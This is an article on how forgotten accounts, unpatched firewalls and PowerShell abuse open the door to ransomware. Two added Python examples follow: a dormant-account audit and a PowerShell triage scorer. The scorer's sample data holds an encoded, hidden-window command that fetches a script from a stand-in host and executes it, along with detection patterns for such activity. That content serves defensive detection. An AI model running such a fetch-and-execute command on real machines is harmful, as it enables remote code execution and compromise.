Closing the security blind spots that are a prime entry point for attacks
Unpatched firewalls continue to give threat actors their golden opportunity
What if the biggest cybersecurity risk is not the attack you fear most, but the weakness you forgot or never knew was there?
Many organizations worry that the next breach will come from a highly sophisticated attack so advanced that nothing could have stopped it. That fear is understandable, but the truth is often more uncomfortable.
Principal Consulting Architect XDR - International, Office of the CTO, Barracuda.
In many cases, breaches do not begin with an unstoppable threat. They begin with a blind spot such as a missed patch, a dormant account, a device outside corporate security control or a firewall left exposed. These small gaps that are easy to overlook are exactly the kind of gaps attackers know how to find.
This is the reality, and one of the key findings from our recent report, which found that, in most cases, it is preventable security issues that open the door. Unpatched firewalls, rogue endpoints, dormant identities and misconfigurations continue to give threat actors the opportunity they need.
Why are attackers focusing more on identity than infrastructure?
Because compromising an identity is often easier and quieter than attacking a system head-on.
Once attackers compromise an identity, they are no longer forcing their way in. They are walking in through a trusted door, and this is an important shift that we’re now seeing.
Stolen usernames and passwords can provide access to cloud services, email and remote access tools, and valid credentials let attackers easily blend in with normal user activity.
From there, they can escalate privileges, move laterally and turn limited access into broader control over the environment.
Sometimes, the speed with which this happens is startling. In one case, we detected that the time between the initial breach and the execution of a full ransomware attack was just three hours.
In another real-world incident, attackers gained access through a dormant account that had originally been created for a third-party vendor and was never deactivated after the contract ended. One forgotten account eventually became the route to ransomware.
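The forgotten vendor account described above is the kind of gap a routine identity audit catches. The following is an added example (not code from the article or from Barracuda) that runs a dormant-account check over a constructed directory export: it flags enabled accounts whose contract end date has passed, accounts that have never logged on or have been idle beyond a threshold, and accounts with no named owner. The record layout, field names and the 90-day threshold are this example's assumptions; a real export from a directory or identity provider would carry equivalent attributes.

```python
from datetime import date

# Constructed sample export (not real data). Field names are this example's
# assumptions; a directory or IdP export would carry equivalent attributes.
ACCOUNTS = [
    {"user": "jsmith", "enabled": True, "last_logon": date(2024, 5, 28),
     "contract_end": None, "owner": "IT"},
    {"user": "vendor-acme-svc", "enabled": True, "last_logon": date(2023, 9, 2),
     "contract_end": date(2023, 10, 31), "owner": None},
    {"user": "temp-intern", "enabled": True, "last_logon": None,
     "contract_end": date(2024, 3, 1), "owner": "HR"},
    {"user": "old-admin", "enabled": False, "last_logon": date(2022, 1, 10),
     "contract_end": None, "owner": "IT"},
    {"user": "mlee", "enabled": True, "last_logon": date(2024, 5, 30),
     "contract_end": None, "owner": "Finance"},
]
AUDIT_DATE = date(2024, 6, 1)  # fixed so the example is reproducible


def audit_accounts(accounts, today=AUDIT_DATE, dormant_days=90):
    """Return {user: [reasons]} for enabled accounts that need review.

    Disabled accounts are skipped: they are already out of the attack path.
    The dormancy threshold is an assumption; tune it to the account type
    (service accounts and break-glass accounts need their own rules).
    """
    findings = {}
    for acct in accounts:
        if not acct["enabled"]:
            continue
        reasons = []
        # The article's scenario: a third-party account that outlived its contract.
        if acct["contract_end"] is not None and acct["contract_end"] < today:
            reasons.append("contract ended %s but account still enabled"
                           % acct["contract_end"].isoformat())
        if acct["last_logon"] is None:
            reasons.append("never logged on")
        else:
            idle = (today - acct["last_logon"]).days
            if idle > dormant_days:
                reasons.append("no logon for %d days" % idle)
        if acct["owner"] is None:
            reasons.append("no named owner")
        if reasons:
            findings[acct["user"]] = reasons
    return findings


if __name__ == "__main__":
    for user, reasons in audit_accounts(ACCOUNTS).items():
        print(user + ":")
        for reason in reasons:
            print("  - " + reason)
```

Run against the sample data, the vendor service account is reported on all three counts (contract lapsed, 273 days idle, no owner) and the intern account on two, while the disabled administrator account is not reported because it is already out of the attack path. The check is deliberately conservative: it reports rather than disables, so that the owner of each account can confirm before access is removed.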
Are organizations still being exposed by endpoint and firewall gaps?
Yes, and at scale. Attackers actively look for unprotected business laptops, tablets or servers that fall outside normal security controls, because these devices can provide a path around corporate defenses.
The issue is not always a lack of security tools. In our experience, from monitoring thousands of different environments, the issue often comes down to a lack of consistent configuration. Security tools that have either been accidentally or intentionally disabled present a major security risk. The danger can be heightened as teams may have a false sense of security that comes from having the tool installed in the first place.
We also know that many organizations are trying to manage too many security tools with limited resources. And when teams are overstretched, configuration errors become more likely. That is often where attackers gain their advantage.
It also helps explain why relatively simple attack techniques remain so effective.
Threat actors continue to exploit known vulnerabilities, including some that have been around for years, which can be found in legacy systems such as old servers or applications.
More striking still, from our analysis of data last year, we found that the vast majority of ransomware incidents exploited firewalls through either a CVE or a vulnerable account.
Why are modern attacks becoming harder to spot?
Some of the most malicious behavior can look annoyingly legitimate.
Threat actors are increasingly relying on living-off-the-land (LOTL) techniques, using legitimate tools already present in the environment to carry out malicious actions.
One of the clearest examples is fileless malware attacks that use PowerShell as the primary execution method.
That creates a serious challenge for defenders. PowerShell is widely used for legitimate IT administration and maintenance. When malicious activity mimics normal operations, it becomes much harder to distinguish threat behavior from business-as-usual.
This is one of the most difficult blind spots organizations face today: not the threat you can clearly see, but the one that resembles something familiar.
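Because PowerShell itself is not the signal, defenders separate legitimate administration from abuse by scoring the context around each launch rather than the presence of the interpreter. The following is an added example (not code from the article or from Barracuda) that scores constructed process-creation records: it weights the parent process, launch switches such as a hidden window or a bypassed execution policy, and the presence of an encoded command, and it decodes any -EncodedCommand argument before looking for dynamic evaluation or remote-fetch keywords, so that encoding alone does not hide the script from the detector. The record layout, the indicator list, the weights and the alert threshold are this example's assumptions; real telemetry would come from Windows process-creation events, script block logging or an EDR feed, and the weights would be tuned to the environment.

```python
import base64
import re

# Launch-switch indicators: (regex, weight, label). Weights and labels are
# this example's assumptions, not a published detection standard.
CMDLINE_INDICATORS = [
    (r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden", 2, "hidden window"),
    (r"(?i)(?:^|\s)-e(?:xecutionpolicy|p)\s+bypass", 1, "execution policy bypass"),
    (r"(?i)(?:^|\s)-nop(?:rofile)?\b", 1, "profile suppressed"),
    (r"(?i)(?:^|\s)-noni(?:nteractive)?\b", 1, "non-interactive"),
]
# Script-content indicators, matched against the visible command line AND the
# decoded -EncodedCommand payload.
CONTENT_INDICATORS = [
    (r"(?i)\binvoke-expression\b|\biex\b", 2, "dynamic code evaluation"),
    (r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", 2, "remote content fetch"),
    (r"(?i)frombase64string", 1, "nested base64 decoding"),
]
# Parents that rarely have a legitimate reason to start an interpreter
# (assumption: tune per environment).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}


def _enc(script):
    """Build an -EncodedCommand payload the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample process-creation records (not real telemetry).
# The hostile-looking one is a generic staging pattern used only so the
# detector has something to score; the URL is a reserved, non-resolving name.
EVENTS = [
    {"id": 1, "parent": "explorer.exe",
     "cmd": r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\Scripts\nightly-backup.ps1"},
    {"id": 2, "parent": "WINWORD.EXE",
     "cmd": "powershell.exe -w hidden -ep bypass -enc "
            + _enc("Invoke-WebRequest https://example.invalid/stage.ps1 | Invoke-Expression")},
    {"id": 3, "parent": "cmd.exe",
     "cmd": "powershell.exe Get-Service | Where-Object Status -eq Running"},
    {"id": 4, "parent": "svchost.exe",
     "cmd": "powershell.exe -EncodedCommand " + _enc("Get-ChildItem C:\\Logs")},
]


def extract_encoded(cmd):
    """Return the decoded script from an -EncodedCommand argument, or None.

    powershell.exe accepts any unambiguous prefix of the switch name
    (-e, -en, -enc, ...), so the check is prefix-based rather than a fixed
    list of spellings. Returns None when the next token is not valid base64.
    """
    tokens = cmd.split()
    for i, tok in enumerate(tokens[:-1]):
        name = tok.lstrip("-/").lower()
        if tok[:1] in "-/" and name and "encodedcommand".startswith(name):
            try:
                raw = base64.b64decode(tokens[i + 1], validate=True)
                return raw.decode("utf-16le", errors="replace")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def score_event(event):
    """Score one PowerShell process-creation record; returns (score, reasons)."""
    cmd = event["cmd"]
    score, reasons = 0, []
    if event["parent"].lower() in SUSPICIOUS_PARENTS:
        score += 3
        reasons.append("launched by %s" % event["parent"])
    for pattern, weight, label in CMDLINE_INDICATORS:
        if re.search(pattern, cmd):
            score += weight
            reasons.append(label)
    decoded = extract_encoded(cmd)
    if decoded is not None:
        score += 2
        reasons.append("encoded command")
    for pattern, weight, label in CONTENT_INDICATORS:
        if re.search(pattern, cmd) or (decoded is not None and re.search(pattern, decoded)):
            score += weight
            reasons.append(label)
    return score, reasons


def triage(events, threshold=4):
    """Return [(id, score, reasons)] for records at or above the alert threshold."""
    alerts = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            alerts.append((event["id"], score, reasons))
    return alerts


if __name__ == "__main__":
    for event_id, score, reasons in triage(EVENTS):
        print("event %d: score %d, %s" % (event_id, score, ", ".join(reasons)))
```

On the sample records only the Word-launched event crosses the threshold; the scheduled encoded command scores for the encoding alone and stays below it, which is the point: an encoded command or a hidden window on its own is ordinary administration, and it is the combination of an unusual parent, evasion switches and fetch-and-evaluate content that distinguishes abuse from business-as-usual. In production the same scoring would sit on top of script block logging or an EDR feed, where the decoded script is available directly.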
How could agentic AI make this worse?
AI is helping threat actors move faster, adapt quicker and scale their efforts far more efficiently.
As threat actors adopt agentic AI, the exploitation of common weaknesses is likely to accelerate. These technologies can help cybercriminals scan environments continuously, identify weak configurations in minutes and rewrite malicious code on the fly to avoid detection.
In other words, the same overlooked issues that are already dangerous today could become even more exposed tomorrow.
That is why basic security weaknesses can no longer be treated as minor issues. In an environment where attacks can be launched and adapted far more quickly, weak identity management controls, unpatched systems and unmanaged devices become far more costly.
So what should organizations do now?
Start with the basics and treat them as strategically important, not operational housekeeping.
Some of the fastest and most effective improvements include: consistent multi-factor authentication and stronger access controls; a disciplined approach to patch management and data protection; and regular cybersecurity awareness training for employees.
But closing blind spots fully requires more than isolated fixes because resilience depends on visibility. The more fragmented security becomes, the easier it is for critical signals to be missed. But when organizations have end-to-end visibility and coordinated management across their environment, they are far better placed to detect both the obvious weaknesses and the hidden ones.
A unified security strategy is one that combines advanced, AI-powered detection technologies with a fully automated SOC. Working with a provider who can deliver that protection 24/7 through a comprehensive managed security platform reduces the burden on internal teams.
And that is what long-term cyber resilience is really built on: not just defending against the spectacular attack, but closing the everyday gaps that attackers are counting on.
As I always say: the breach that changes everything often begins with something that seemed too small to matter.
This article was produced as part of TechRadar Pro Perspectives, our channel to feature the best and brightest minds in the technology industry today.